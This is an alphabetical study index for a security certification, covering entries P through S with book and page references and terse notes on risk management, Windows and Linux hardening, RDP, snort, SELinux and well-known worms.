Program Policy                      2    71   high level,provide direction for compliance with industry standards such as ISO,QS,BS,AS
protect pass crack                  2   137   strong policy,shadow,one-time,passwd+,Fighting pre-comp attack,protect enc pass
Protected Enclaves (‫)جيوب‬           2    16   Segmenting ur network,many Vlan,VPNs, firewalls
protocol - Linux                    6   107   any protocol in /etc/protocol
                                              set of protocols needed together for communication,each layer receive a serrvice form the lower layer and provide
protocol stack                      1   40
                                              a service to the upper
proxy firewall                      3    62   slowest,inconvient to mange,traffic regenrated,painful in large organization
ps                                  6   199   monitor you running processes
ps (process status)                      6   64,65   ps command and it is detection control
                                                     thing that looks Vulnu but they acts as alarm or trigger actions if an intruder attempts to exploit the flaw,not a
pseudo flaw                              3    28
                                                     honeypot or honeynet
psExec                                   5   284     remote excution of commands,sysinternals
psexec.exe                               5    55     excute process on remote machine , without going to pc like telnet , excute batch
psinfo                                   5   284     show computer configuration ,service packs,patchs,software
psloglist.exe                            5   328
Public key                               4    29
Public-key crypto - Who invented it ?    4    29
pwd                                      6   210     command to print the working directory.
quadratic time                           4    51     O(n^2)
qualtative risk analysis                 3   271     easier,identify high risk areas, [low, medium , high] risk categorization
quantitve risk analysis                  3   271     far more valuable as a business decision tool,work with metrics, Dollars, Monetary loss value.
QUERY_STING                              2   228
QWinApt                                  6   166     synaptic/QWinAPT GUI tools use apt to install,upgrade,remove pkg (debian)
R^3                                      3    96     reconnaissance,resource protection,ROI
race conditions                          3    38     exploiting the diffference between a security control and the time of applied service
RADIUS (Remote Authen dial-in usr svc)   2   114     UDP based
Rainbow table                            2   124     hashed password
Rainbow table                            2   133     pre computed hashes ,cryptanalitic
rainbowCrack                             5   171     software to crack passowrd hashes , NTLMv2 not vulnerable to cain + rainbowcrack
Ramen                                    2    28     Web defacment&mail pass to attacker,RedHat OS use hol in file&printer sharing services
ramen worm                               6   185     save it's code in /usr/src/.poop on the infected linux
randomize_hosts                          3   126     little more difficult to detect,random selection of ip range
raw tcp sockets                          5     7     not permitted to send user data only udp sockets are allowed
RBAC (Role-based Access control)         2   109     assign user to rols or groups based on their function
RCMD and REXD                            6   105     rpc service allow execution of program or part of program remotely
RDP (Remote Desktop Protocol)            5    15     give user GUI of another remote host,in server2008 enhanced features
RDP 6 client                             5   256     NLA support,server 2008 later built in,download for xp ,2003
RDP 7 client                             5   258     performance enhanced not security
RDP best practices                       5   259     NLA,128bit encryption minimum,Tls,smart card,block access to local drives
RDP citrix                               5   260     enhanced management captabilities in rdp clieny,thin client for linux,solaries,mac
RDP Encryption levels fips compliant     5   256     rc4 is not permitted
RDP encryption levels server2003         5   256     low-client comptiple-high-fips compliant
RDP(Remote Desktop Protocol )            5   256     terminal service and remote desktop use RDP on tcp port 3389
RDS ( Remote Desktop Services )          5   252     graphical remote control of virtual desktops hidden in ram of the rds server
RDS (Remote Desktop Services) license    5   253     remote administration,application server
Real evidence                            2   187     tangible item:siezed pc,USB drive,printout
REBAC(ruleset-based Access control)      2   110     action based on rules for user (subject) operating on data (object)
RedFang                               4   152   tool to attack Bluetooth, cancircumvent the security of BlueTooth networks.
redhat benchmark                      6   188   require sun java runtime env.(specialy version 1.5(5.0)),don't get anything older or newer
REG.exe                               5   108   cmd tool to edit ,view registry
REGedit.exe                           5   108   GUI to Edit view registry
registeration spoofing                1    78   social engineering attack ,attacker convince the registrar that the domain exist in another dns
registry                              5   108   DB of == configuration setting for all computer hardware,applications…
Registry "allowedpaths"               5   110   a subkey in winreg define the registry paths that can be readable paths
Registry "winreg"                     5   109   key to control sharing permission of registry,default values see book ==used to put share per to registery
Registry key permissions              5   109   against local and remote access to registrt,share permission,WINREG key
Registry keys                         5   108   yellow folder holding files called values
registry permissions                  5   111   regedit>highlightkey>edit>permissions,use security template or GPO
Registry values                       5   108   file-looking objects contain the type:REG_Dword and data which is the set to
Registry vs. Active directory              33
REGSVC.exe                            5   109   service allow remote connection to registry. to disable remote remove this service
Regulation                            2   178   SOX,GLBA,HIPAA,PCI
relay                                 3    74   when attacker break in a site and uses it to attack other sites
remember=$                            6   61    this value is the no of old passwd remembered in/etc/pam.d/system-auth in pam_unix argument
remote assistance                     5   255
remote desktop                        5   253   terminal services on xp/vista,prevent user with blank passowrd to logon
Remote Desktop Services Application   5    15   ability to host individual applications on RDP server instead of entire desktops
remote desktop services web acces     5   255   active-x version of remote desktop client on server2008-r2 and later
remote login service, rlogin          3    11   port 513 Tcp, rlogin command ,allow commuincating to remote machine
remote maintainence                   3    36   allow administrators into a sytem to troubleshoot a problem remotely,GoToMyPc
Remote registry service               5   109   REGSVC.exe,service allow remote connection to registry
remote server administration tools    5   270   vista and later,allows an administrator to sit at workstation and manage active directory
Replay attack                         2   113
Report Unsafe                         5   187
require encryption                    5   215   mutual authentication and encrpytion
resarch honeypots                     3    74   weak,unpatched,vulnerable,host trap,tactics,motives,tools
resource seperation                   1    31   one of the elements of defense in depth (sepreate DNS,mail,web server)
response(corrective control)          3    99   the countermeaasure they use to fight threads once they are found
restore point                         5    76   to create auto. A variety of time
Restore Point from calender           5    78
                                                password enforcing (pam_cracklib argument) and restricting use of previous passwd (pam_unix argument) &
restrict use of previous passwords    6   61
                                                create /etc/security/opasswd
                                                measures must be implemented to avoid unwanted access,detected if unwanted access occurs,procedure if breach
restricted area                       1   234
                                                happen
restricted area - escort                        1   237   employee escort:disable all his access,take badge,parking decal,escorted by guard or at least two managers
Restricted Sites Zone                           5   186   list URLs for sites that you don’t trust
return address                                  3    32   the point by which the inserted payload is able t control the cpu or crash the program
reverse engineering                             2   116   it is used for detecting algorithm used to generate instance SW
Reversible encryption                           2   116   for encryption, not recommended for passwords
REXD and RCMD                                   6   105   rpc service allow execution of program or part of program remotely
rf-barriers                                     3   151   metal-screening inside exterior walls to reduce wireless signals
RFC 1918                                        3    67   Private range
rijndael cipher - AES @ ZigBee                  4   161   also provides integrity protection that prevents encrypted traffic from being altered during transmission
ring physical topology                          1    9    each machine has 2 netowrk connection,bi-directional communication
ring physical topology disadvantage             1    9    confidentiality is not guarntied,if one cable drpped the loop will have problem
Risk                                            2    7    risk=threat*vulnerabilites
risk                                            3   265   equal vulnerability * threat
risk                                            3   265   u have to link the vulnerability and threat before talking about risk
risk analysis matrix                            3   261   the x-axis is severity of consequences,y-axis is propability of liklihood
risk analysis matrix                            3   275   provide the best way to focus on the real threat by focusing on the threat vectors in the matrix.
                                                          1-Identify existing countermeasures, threats and vulnerbailities. 2- support expenditure(price) of resources and cost
risk analysis purpose                           3   275
                                                          effective safeguards. 3- Aid in selection of cost-effective countermeasure to reduce risk to acceptable level
                                                          for technicals it's easier. According to the standard or best practise, u could avoid risk after depolying a standard like
risk assessment (knowledge Vs best practise)    3   267
                                                          ISO standard .
risk Evaluation                                 3   282   risk management step 4,calculate ale
risk forms                                      3   264   information security risk is one form of multiple risks
Risk internal attacks                           3   277   use HIPS, windowes event log, tcpwrappers, honeypots, unix Xinetd, TCPwappers.
Risk malcious code                              3   279   Virus scanning, HIDS(Tripwire unix & windows ),Egress filtering catch worms
Risk manage step1, threat Assess & Alanysis     3   275   identify type of threat,look for evidence, two outsider attacks, two insider attacks,malcious code
Risk manage step2, Identification & Valuation   3   280   asset identification and valuation
Risk manage step3, Vulnerability Analysis       3   281   vulnerability analysis,
risk management                                 3   256   the art of analyzing threats and vulnerabilities and determining the impact on enterprise
risk management cycle                           3    23   consist of three parts:preventation,detection,response
risk management focus                           3   256   to reduce the risk until it is in acceptable level
risk management goal                            3   258   identify,measure,control and minimize liklihood of attack
                                                          to decide between accepting, mitigation or transfering the risk, they are: what could happen? how bad? how often
risk management questions                       3   266
                                                          happen? how reliable(degree of uncertainty)?
risk management step 4- risk evaluation         3   282   risk evaluation
risk management step 5- interim report          3   283   interim report
risk management steps                           3   262   set security infrastructure,design controls for each tech,……..
risk managementem phasis               3   263   focus on the process not just series of actions
                                                 use newspaper, hacking web sites, firewall & ips logs, scan netework with SNMP to look for other routes &
Risk outsider attacks - internet       3   276
                                                 backdoors, try to connect ur wireless from parking lot
risk uncertainty                       3   267   risk require uncertainty with probability from 0 to 1, people always express it as a percent
rlogin                                 3    11   port 513 Tcp, rlogin command ,allow commuincating to remote machine
rlogin -l root                         3    16   ,-l username , starts the terminal session on a host
rm<file_name>                          6   220   delete files or directory
rmdir <dir_name>                       6   219   remove directory if empty only
robocopy.exe                           5    73   builtin 2008/vista/seven and can be installed on xp/2003
                                                 copy large files in long folder path,copy EFS files,can mirror folders,can't copy locked files == backup utility to backup
robocopy.exe                           5   73
                                                  selcted files in vista ==
robocopy.exe command                   5    73   options
robots.txt                             4   261   u can see unlinked gages to not to search in it.
RODC (Read Only Domain Controller)     5    15   can use bitlocker with tpm chip and likely installed with server core option
RODC credentials                       5    33   a list of chache is tracked so if comprmise the users is forced to change passwords
ROI                                    3    97   ROI=(gain-expendenditure)/(expendenture)*100%
ROI                                    3    97   for evaluating to go ahead or not in the purchase,for perdicting revenue
ROI (Return on investment)             3   97    the financial benefit or return received from a given amount of money or capital invested into business
ROI(return on investment)              4   147   huge ROI of wireless on the hospitals (healthcare) industry.
role                                   6   202   set of permissions granted to a user and end with _r
roles & features add/remove            5   200
roles in SCW                           5   196   you can select roles you want & SCW will perform many security reconf. Tasks for you
roles in server manager                5   199
rollback                               5   196   you can roll back the last set of changes
roll-up                                     57   fix many issues at once
rootkitrevealer                        5   284   help to detect rootkits,sysinternals
rootkits                               3    41   subvert kernel, process management, file access, security and memory mangement functions
rootkits                               3    41   cracker tool is insreted stealthily into the local OS and subvert it
rootkits linux                         3    41   loadable kernel modules under unix are called device drivers files
rootkits windowes                      3    41   using microsoft development kit for win2003 server
ROSI (Return on Security investment)   3    97   like the ROI,specific for security
ROT-13                                 4    19
rotation of duties                     4   240   regularly rotate positions to alleviate the collusion between the employees
Rotation Substitution                  4    19   use one-to-one substitution of characters, Rotate the alphabet by X characters.
route -n                               6   197   list the networks with a live route
route.exe                              5   283   show routing table
Routing and Remote Access Service      5    15   RRAS,support both ipsec and ssl vpns
Routing and Remote Access service      5   230   multiProtocol router,can make Nat,load balancing,fault tolerant,NLB driver built in
routing loops                        1     53      ttl guars against routing loops
Routing workload                     2     88      have to sites test patches in one if work well make it prim and the other backup which will test another patch
RPC (remote Procedure Call)          6   102,103   clinet-server based and it is setup so that the client calls functions in the server program
rpc calls padded                     3     199     32-bit words-always carry a lot of zeros
RPC/Dcom                             5      7      in xp sp2 annoynoums over the network rpc are not permitted
rpcinfo                              3      10     get a list of all rpc service and details about them on a remote host
rpcinfo -p                           3     199     list the available rpc ports on a remote host
RPCSec                               6     102     is the secure version of RPC
rpm                                  6     163     package manager solution for redhat linux
rpm -rebuilddb                       6     164     update/rebuild the rpm header db
rpm -F pkg                           6     163     freshen pkg( update installed packages)
rpm -i pkg                           6     163     install package
rpm -initdb                          6     164     create new rpm header db
rpm -q pkg                           6     164     query to see if pkg is install or error if pkg isn't install
rpm -U pkg                           6     163     upgrade pkg ( if pkg not installed, install it)
RRAS                                 5      15     routing and remote access service
                                                   routing and remote access service,stateful firewall built in win server but not enabled ,, maange with RRAS snap in
RRAS                                 5    230
                                                   or with NETSH.exe
                                                   most common Asymmetric key Encryption, it can be used to support both encryption and digital signature, it's a
RSA                                  4     67
                                                   central part of Secure Socket layer (SSL)
RSA                                  4     67      the security of cryptosystems comes from the secrecy and size of the private key
RSA vs. DES                          4     68      DES is 100 times faster than RSA.
RSA vulnerability                    4     67      RSA Vulnerabilities come from: 1- Poor RSA implementation, 2- ising small key length
RSAT                                 5    270      vista and later,allows an administrator to sit at workstation and manage active directory
RSH                                  6    105      rpc service allow a user to get a remote shell
rsh protocol                         3     15      port 514Tcp non interactive commands on remote host using rsh command
RTP Replay attack                    4    228      Attacker will record a specific telephone conversation, then broadcast the content to large number of VOIP users.
RTP Sniffing                         4    228      with tools like: WireShark
RTP stream manipulation              4    228      Man - in - the - middle attack
run condition (level) dir            6     89      /etc/rcX.d, normally there's one directory for each run condition, file starts with S or K
                                                   init selects which set of scripts to run based on run level, run level is defined in /etc/inittab file, each unix system
run levels                           6    86,87
                                                   has it's own run levels
runas.exe                            5    176      can launch programs under different privilages , program in vista to run programs with other privilage
S/Key                                2    142      pre-compute list of passwds when sys 1st config ,when usr login use diff S/key
S/MIME - Secure E-mail               4    129      another use of PKI is to encrypt or digital sign e-mail messages, bulit in many mail clients, outlook, blackberries
SACL (System Access Control List )   5    111      provide auditing captabilites
SACL (System Access Control List)       5   321   different for different objects,can be inherited
Sadmind/IIS worm                        2    40   infect solaris&MS buffer overflow attack in vuln in sadmind prog.
                                                  is the bluetooh algorithm that used for encryption and authentication, & is a submission candidates for AES
SAFER+ cipher by Cylink                 4   152
                                                  algorithm, 128-bit key
safety plan consideration               1   222   should consider:smoke and fire,natural gas explosion,toxins,poor air quality,structural failure
safety walkthrough                      1   245   exit doors must be clear,door function propably,alarms fully functional,people know what to do
safety warden                           1   220   responsible for evacuation team ,last one to leave
SAM                                     2   131   Security Account Manager
                                                  software run on unix/linux allow host to interact with windows client or server as if it were a windows file and print
samba                                   6   99    server, this interaction is like connect or disconnect of directory mapping and printer sharing on Microsoft
                                                  Systems, using SMB protocol [unix implementation of SMB]
Sandbox                                 2   238   run browser in restrict mode,limit ability to interact with other data on pc,ex applet
Sasser Worm                             2    31   W32,infected systems and their backup,systemrun slowly and shutdown
SAT (Security Access Token)             5    35   never sent over the network,important parts sent in the network by authentication protocol
SAT (Security Access Token )            5   116   contain integrity SID for MIC label,list of all user rights
SAT (Security Access Token)             5    28   your identf. & rights,each program has a copy of SAT, whoami.EXE / all / fo list --------->win.7
                                                  allow regulation to resources (files-folders-printers-registry keys) == consist of(SID of user domain AC+SID of domain
SAT (Selective Access Control)          5   86
                                                  group
satan                                   3   117   first vulnerability scanner
SB1386                                  2   178
S-box substitution                      4   65
SBU (senstive but unclassified)         2   104   senstive data and shouldn’t released like social security num
sc.exe                                  5   194   configure each aspect of every service or device driver on local or remote machine
sc.exe \\pc qc service_regkey           5   194   query the configuration information about the service specified by registry key
sc.exe \\pc query                       5   194   query list of services from remote pc
sc.exe \\pc queryex service_regKey      5   194   show more details extended information about the service specified by registry key
sc.exe \\pc service_regKey start=disa   5   194   start=disabled,to disable service permentaly specified by registry key
sc.exe \\pc service_regKey stop         5   194   to stop service specified by the registrykey from getKeyName
SC.EXE better than NET.EXE              5   194
sc.exe config netbt start=disabled      5   206   disable netbios service
sc.exe config netbt start=system        5   206   system default case for netbios
sc.exe getkeyname Service_name          5   194   getkeyname to get the registry key for the service
sc.exe qc netbt                         5   206   query the configuration information about the netbios service
SCA datbase                             5   150
                                                  used to configure computer to match security template in one easy step,no undo == is used to import temp &
sca snap in                             5   150
                                                  apply it to PC == SCA limitation --> only on local machine not across network
SCA snap in                             5   298
scanline                                5   284   command line port scanner,when winpcap has problems ,foundstone
scheduling jobs                         5   294   task schedualr , LSA Secrets portion of the registry
schema                                           5    39   define all types of objects and their attributes in directory
Schnorr signature scheme                         4   54    an algorithm that uses the intractable problem of discrete algorithm for finite fields
schtasks.exe                                     5    55   xp and later , schedule commands to run at specific time or periodicaly , excute batch
SCHTASKS.exe                                     5   294   by schedule
                                                           program that rate ur system on how secure is (no don't have a direct meaning but it does allow a relative cmparison
scoring tools                                    6   187
                                                           between systems), free tool
screend network traditional                      3   54    design a network to trusted and untrusted zones,dmz ,risk to be comprimized
screening & selection of employees - OPSEC       4   239   invetigate about ur emplyees before hiring them, look for their history, make sure that ur HR is doing his work
scripts using GPO                                5   292   startup/shutdown run in computer context,logon/logoff run in user context
SCW (Security Configuration Wizard )             5   196   builtin knoweledge about services ports and network components needs for roles or functio
SCW (Security Configuration Wizard )"scw.exe."   5   196   server2003 sp1,can't be installed in vista/seven,work in server2008
scw xml policy file                              5   197   can be used to configure server or to analyze the complaiance to this policy
scwcmd.exe                                       5   197   cmd tool for thw scw GUI,scriptable version
scwcmd.exe analyze /?                            5   198   to see analysis and report options of tool,/m:machineName,/p:path&polocyFile,/o:output
scwcmd.exe configure /?                          5   198   can configure list of computers but you can't rollback a list,to config OU
scwcmd.exe configure /p:file.xml                 5   197   file.xml is the policy file which will configure a server with for services run,disable,stop
scwcmd.exe transofrm /p:policyfile g             5   198   /p:file.xml /g:grouppolicy file ,can take xml policy file and convert it to GPO
scwcmd.exe view /x:report.xml                    5   198   view the report from scw using nice gui
SDHC slot                                        5    17   slot in mobiles,multi gigabyte memory at least 8 giga
searcher                                         1   220   check each place for employess,put signs that no one there
search-textlog.ps1                               5   248   script take 2 argument :iis log file,text for regular attack patterns and search for those
Secedit.exe                                      5   152   cmd tool for security configuration and analysis SCA
secedit.exe                                      5   299   cmd for SCA , steps
SECEDIT.exe or SCA                               5   193   disable all the undesired services in one shot
secedit.exe /configure/db a:\db.dbs              5   152   configure computer using the database from floppy
Secure coding                                    2   242   validate usr i/p,initialize var,don’t make app req admin privil,don’t display error,
secure connection                                5   216   mutual authentication and packet signing
Secure E-mail(S/MIME)                            4   129   another use of PKI is to encrypt or digital sign e-mail messages, bulit in many mail clients, outlook, blackberries
secure host                                      5   190   a hardened machine against vulnerabilities not discovered yet
Security and Configuration and Analysis          5   193   to disable service
Security by Obscurity is no Security             4    8    proprietary alogorisms are high-risk, because it's not available for public scientists to check the cipher
security configuration and analysis              5   150   SCA,can save database file .sdb,can't apply through network
security configuration wizard functi             5   197   enable/disable service,configure firewall roles,ipsec policies
security enhanced applications - Linux           6   200   SELinux and Apparmor
security information event management            3   204   a security information event management station,combine multiple sources into one machine
security lights                                  1   243   detective control
security options in linux                        6   199   Boot Loader Password, PS, Netstat
Security policy                               2    52   What to do
Security policy - Why ?                       2    52   protect info,people,org,
Security posture(‫)الوضعيه‬                     2    56   look into mirror,what security looklike now
security template                             5   145   AscII file contain configuartion of security settings,snap in
security template enterprise client           5   147   EC,for computers joined to active directory 2003 or later
security template files                       5   146   .inf file stored by default in /systemroot/security/templates
security template store                       5   145   password policies,account lockout policies,kerberos policies,audit policies == ASCII files contans security setting
Seeion Attack Protection                      2   255   make it random or long ,digitally sign or hash it ,provid session id new at authen,make expire time
Seizure                                       2   179
Seizure with warrant                          2   179
self digonastic procedure                     1    14   in token ring system identified itself having a problem will pull him self from the ring to check itsef
self-synchronizing stream cipher (auto-key)   4   24
                                                        Security Enhanced Linux, enhance the default DAC security of the unix system with the inclusion and mangement of
SELinux                                       6   200
                                                        a MAC security effort
                                                        a linux security enhancement features, uses security based policies , based on u.s department of defense style MAC,
SELinux                                       6   201
                                                        uses linux security modules(LSM) in linux kernel
                                                        each level is a sensitivity -category pair with category being optional, when using category the level is written as
SELinux - MLS/MCS                             6   205
                                                        senstivity:category-set( s0:c0.c1023)--> from c0 to c1023, if category not used the level is written as sensitivity
                                                        target --> focus on particular app and processes unless identified the rest of the processes run un restricted, strict --
SELinux - security policy                     6   203
                                                        > manage all processes and must be managed individually
                                                        are assigned to processes so types of similar function can be assigned similar perm to application or the system end
SELinux - type or domain                      6   202
                                                        with _t and it is used when referring to object
Selinux DAC                                   6   204   this allow the sys admin and all users to manage the security of files they own or manage
selinux DAC allow                             6   204   selinux access policy applied
selinux DAC deny                              6   204   will not use selinux access on object
                                                        any exploit that allow access to the system as any potential user may be able to elevate themselves or processes
selinux DAC flaw                              6   204
                                                        they own and defeat or circumvent security
                                                        context of users in relation to object or subject (file or/and dir) context --> file or dir and have 3 parts user account ,
SELinux parts                                 6   202
                                                        role,type or domain
SELinux uses DAC                              6   201   DAC allows users full security access over their installed and owned application, lead to security risks to system
                                                        to allow admin the ability to controll all interactions of software on the system, the security model based on least
SELinux uses MAC                              6   201
                                                        privilege and start with users having no right
separation of duties - OPSEC                  4   240   try to look for ways to reallocate tasks across multiple positions.
Server Core                                   5    14   server2008,doesn't include startmenu,taskbar,control panal or internet explorer
server core option /installation              5   200   no standard graphic
Server Hardening                              2   220   patching , close(ports,application,default user account),strong password…erc
server manager                    5   199     server2008 and later,orgainze server captabilities into rules and features,help dependency
Server side Programming           2   236     can be run on the web server, app. Server, and as stored procedures on data base server
servermanagercmd.exe              5   200     cmd tool for server manager ,scripting enable
servermanagercmd.exe -query       5   235     to see which roles or features are installed right now
SERVERMANAGERCMD.EXE tool         5   235     install/uninstall roles & features
service command                   6   93      service <servicename> [start|stop|restart] , service --status-all -->get status of all services.
service dependencies              5   194     from dependencies tab you can know what services depend on what
service disabling                 5   193     administrtitve tools ,security template inf,GPO,Sc.exe
                                              if you don't need service turn it off, update and patch all services running or not to: 1- prevent local exploits by un
service management                6   91,92
                                              privileged users, 2-to be patched incase to re-enabling it
service name- Linux               6   107     all services are defined at /etc/services
                                              a collection of updates and hotfixes rolled up in one large installition package           service pack-giant patch has
Service Pack                      5    52
                                              som hotfixes&updated together                                   service pack-is bet 100 to 300MB
service pack batch installition   5    55     batch file then run it remotly or from psexec.exe or schtasks.exe or exec.vbs
                                              lab test +deploy in limitied groups(staging) == don't staged roll-outs & check for problems == service pack-test it
Service Pack Problem discovery    5    52
                                              at lab first because it break application or net problem (test by VMware)
service pack staged deployment    5    53     few boxes at atime,start with the least important,end with the most critical
                                              1-at boot time, 2-automatic by init or rc scripts which use inetd/xinetd(on demand services), 3- cron scheduler
service started how?              6    73
                                              (crontab), 4-command line
services startup settings         5   193     disable service
Session cookie                    2   232     stored only in memory,when browser exit it lost forever
session hacking                   2   253     sesion id in url->attacker can edit it,hidden or cookie->can use proxy or firefox plugin
session id                        2   252      in cookie or URL query
session layer                     1    44     handles the establishment and maintainance of connection
session toolkit                   2   255     tools like webScarab
session tracking                  2   252     use session ID in cookie or URL query
set in cmd.exe                    5   289     to see your enviromental variables
setenforce                        6   203
setgid                            6    39     same as setuid but programs run with group perm
setgid for dir                    6    38     when new file is created in the directory it will inherit the group of the directory-->perm rwxrwsr-x
setuid                            6    38     programs run with owner permission used with executable files--> perm rwsr-xr-x
Sever Core                        5   234     is installation option
sever2008 r2                      5   234     inculde handling ASP.net framework & XML configuration files
SGI machine                       6   141     IRIX unix
SHA - Secure hash algorithm       4    32     Secure Hash Standard (SHS), 160-bit value
sha256deep.exe                    5   310     Compute SHA-256 message digests
shadow file fields                6    53     username, passwd, last, may, must, warn, expire, disable, reserved
Shadow passwords                  2   141     /etc/shadw rather than /etc/passwd
shallow inspection                       3   181   header only,very fast
share permissions                        5   101   no inheritance,multiple share names with different permissions
share permissions                        5   102   are enforced when access is done through SMB
share permissions                        5   103   full control,change,read       no inheritance in share permissions
share permissions 2003 /later            5   103   default permission is read for everyone group
share permissions xp                     5   103   default is full control for every one and this default can't be changed from registry
shared folder access                     5   101   network places,mapped drives,start menu run,shortcuts
                                                   the portion of the OS with which users and process interact directly ( it is command line interpreter& provide user
shell                                    6   25
                                                   with interface to the system)
shell                                    6    30   listen to the terminal then translate request into action by the kernel and programs
shell examples                           6    31
short-term solutions                     3   286   short amount of time for little or no cost
showmount                                3     9   list file system on a remote host,NFS file system
SID (security ID)                        5    26   for each user or group,unique,
SID security id well known               5    26   S-1-1-0 Every one Group,S-1-5-11 Authenticated users group,s-1-5-32-544 local admin group
siem                                     3   204   a security information event management station,combine multiple sources into one machine
SIG - Bluetooth Special Interset Group   4   151
Signature & certificate revocation       4   133   at PKI
signature analysis                       3   175   checksum of file,string search,protcol,address,port,payload contents,flags,traffic flow analysis
Simple file sharing network access       5   174   with simplesharing disable users authenticate as themselves , Classic-local uesrs authinticate as themselves
single crack mode                        2   126   use user name and GECOS info,add prev gused pass,faster than wordlist
SKEME                                    4    97   secure key exchange mecchanism, extend the capabilites of Oakely.
Skype                                    4   222   proprietary VOIP, clients relay traffic for each othes (P2P)
SLE (service level agreement)            2   244   define how to mentain security of hosted app,
SLE (single loss expectency)             3   268   the loss from single event, if u had been exploited what it would cost u
SLE (single loss expectency)             3   269   Asset value * Exposure factor, if conference room=$100,000 and terrorist attack cause 50% loss --> SLE= $50,000
slipstreaming                            5    54   update the source of windowes so when installing it with sp one shot
SMART                                    2    70   Specific,Measurable,Achievable,Realistic,Timebased
smart card EFS                           5    12   the storage of your EFS decryption key on the same card you logon with
smart cards                              1   241   electronic badges that include a magnetic strip or chip that can record and reply aset key
smart cards rekeying                     1   241   rekying is inexpensive because it requires only removing the current acceptable code from the lock
smartDefense                             3   251   help against worms,trojans,integrated into vpn-1
smartScreen filter                       5   187   check for phising,malware web sites,check via microsoft database,automatic,manual
SMB (server message block)               5   101   allow sharing of resources files printers
smoke and fire                           1   223   detective controls:smoke detectors,heat sensors-suppressive controls:sprinklers,fire extinguisher
smurf attack                             3    29   spoofs a victim ip and send echo request - broadcast - to a nwtwork
snapshot content                         5   308   user accounts,group membership,shared folders,user rights,process,network coniguration
snapshot.bat script                               5   310     output is 15~30 mb ,5 to 15 min to run
snapshot.bat script                               5   310     ******4 pages********
sniffer                                           1   134     it's important to use promiscuous mode to see all traffic
sniffer tools                                     6   190     if packets are not flowing correctly or there are network problem to diagnose
                                                              copy packets from network cable ( need to be run as root), Display summary of important header & save them to
sniffers                                          6   190
                                                              disk for later reporcessing
sniffers examples                                 1   136     rootkit sniffers seek the usernames and passwords in the network
sniffing -- switch                                1   137
                                                              starts as testing tool for a honey pot systems software, intrusion detection system ( run on any thing), it's a
snort                                             6   195     powerfull sniffer application, free and commertial versions , strong and supplied ruleset, user can add their own
                                                              rules
snort - Key points                                3   204
                                                               to actually elicit some alerts, we will tell nmap to probe for open services on a remote machine in a different
snort - to see its output                         6   196
                                                              terminal window, the port scan will show up in snort console
snort -vd -l /root/log -c /etc/snort.conf -i lo   6   198     snort as FULL IDS this configuration file tell snort which attacks to look for
                                                              1- make log dir, 2- snort -vd -l /root/log -i lo , a summary of the packets is kept in the directory tree under one of
snort as a packet logger                          6   198
                                                              the ip address in the packets
snort as IDS                                      6   198     snort -vd -l /root/log -c /etc/snort.conf -i lo
snort as NIDS                                     3   198
snort as sniffer                                  6   198     it show packet to the screen run it as snort -vd -i lo
snort -d                                          6   196     print the application layer as well as the default header
                                                              snort will do the same job on these platform since it is compiled from the same source code but in linux
snort diff between linux & windows                6   197
                                                              performance will be better, widnows system start to drop packets as no of packets and attacks per second go up,
snort -e                                          6   196     show the ethernet mac address or link address for ur cable type
snort -h                                          6   198     snort -h="home net", tell snort which address is local and the other is used as the packet directory
snort -i{interface}                               6   196     tell snort to sniff on that interface
snort operating modes                             6   198     snort as sniffer, snort as packet logger, snort as IDS
snort rule flexibility                            3   200     snort user community develop new rules to detect the latest exploit,virus and worm or other attack technique
snort rules                                       3    201    basic (pass- log-alert),advanced (activate-dynamic)
snort rules -Advanced                             3    203
snort rules -simple                               3    202
snort uses                                        6    196    run in the foreground as an IDS
snort -v                                          6    196    snort in verbose mode, it print m ulti line summary of each attack
snort -vd -i lo                                   6    198    snort as sniffer
snort -vd -l /root/log -i lo                      6    198    snort as packet logger
snow + options (injection Stego)                  4   40-41   is command line program and tools for injection
sobig worm                                        3    118    most prolific e-mail mass mailer,aug2003
social engineering                      3    107      describe an attempt to manipulate a person to provide information or acces to information
social engineering                      3    108      human based: urgency-third person authorization,computer based: pop-up windowes,mail attachment
social engineering defense              3    109      policy,procedures for granting accesss,educate user to report any malcious activity
Software key store                      4    121      smart card
software update service SUS             5     61      old version of WSUS
solaris pkg manager                     6    167      pkgadd,pkgrm,pkgchk
somarsoft                               5    284      dumpsec,dumpevt,dumpreg
someplace you are                       2    106      GPS
sometthing you are                      2    106      biometrics
sometthing you have                     2    106      Token
sometthing you know                     2    106      password
SoulSeek                                2     41      peer-to peer application
sourcefire                              6    186      provide commercial support for clamav and it sells snort app and support
SOX()                                   2    178      Acounting
special needs assistance                1    220      responsible for keeping list of all who need asssistance
specialized security limited function   5    147      SSLF,maximum security template scarfice backward comptability,peak performance
                                                      captur passwords, looking for attacks, ithem in some form can listen to raw packets flying by a network cable and
specialized sniffer                     6    190
                                                      show them or analyze t
SPID (service profile identifier )      1     18      estaplish connection between ISDN sites
Split operation Model                   2     88      have to sites to cover one another in case of desistar
SQL Injection                           2    262
SQL Injection defnense                  2    264      validate usr i/p,filter,length limit,access control,don’t display SQL error
SQL Security using MBSA                 5    303
sql server security tips                5    249
SQL Slammer                             2     30      DOS Attack,use UDP Port 1434,exploit buffer overflow vuln in MS SQL server&MSDE
squid                                   6    175      is a Linux proxy application used for Web & FTP, & can coexist with Iptables.
SRP (Software Restriction Policies )    5    177      define exactly what excutables can and can't run in winXP or later == who can or can't launch process or sw ==

                                                      help to fight malware,which process can user run , MD5 - UNC - Zone , SRP exception to allow or deny by 4 methods
SRP (Software Restriction Policies )    5   177,178
                                                      , Basic User , Unrestricted , create exception to default policy , Default deny policy , Default Allow policy , Disallowed
SRP designated file types               5    178      Global SRP,define which file types the SRP policies apply,can add new file types
SRP enforcement option                  5    178      Global SRP,to exculde admins and maybe dlls from SRP policies
SRP exceptions                          5    177      4 exceptions,hash of excutable,issuer of digital certficat,UNC path of excutable,zone
SRP global options                      5    178      enforced options,designated file types,trusted publishers options
SRP trusted publishers options          5    178      determine who decide to trust certficates,whether CRL is required
                                                      is one use of PKI to encrypt msgs between web server and web browser, done by SSL & TLS, client & server uses PKI
SSL (Secure layer socket)               4    125
                                                      certificate (Asymmetric) to negotiate a session key (symmetric)
SSL (secure socket layer)                2    234     provide encryption,identity verification,data integrity,use port 443
SSL handshake                            4    128     SSL Steps from client to server
SSL PKI crypto                           4    128     SSL Steps from client to server
SSL portal VPNs (Client - Site)          4     99     Client - Site, accessible to more user than SSL tunnel VPNs( site - Site)
                                                      quit different of IPSEC tunnels, in that SSl tunnels always created by non-standard tunneling methods while IPSEC
SSL tunnel VPNs                          4   99-100
                                                      used standard methods
SSL VPN                                  4     99     should open firewall ports 80 & 443
SSLF                                     5    147     specialized security limited functionalty ,, template sec level
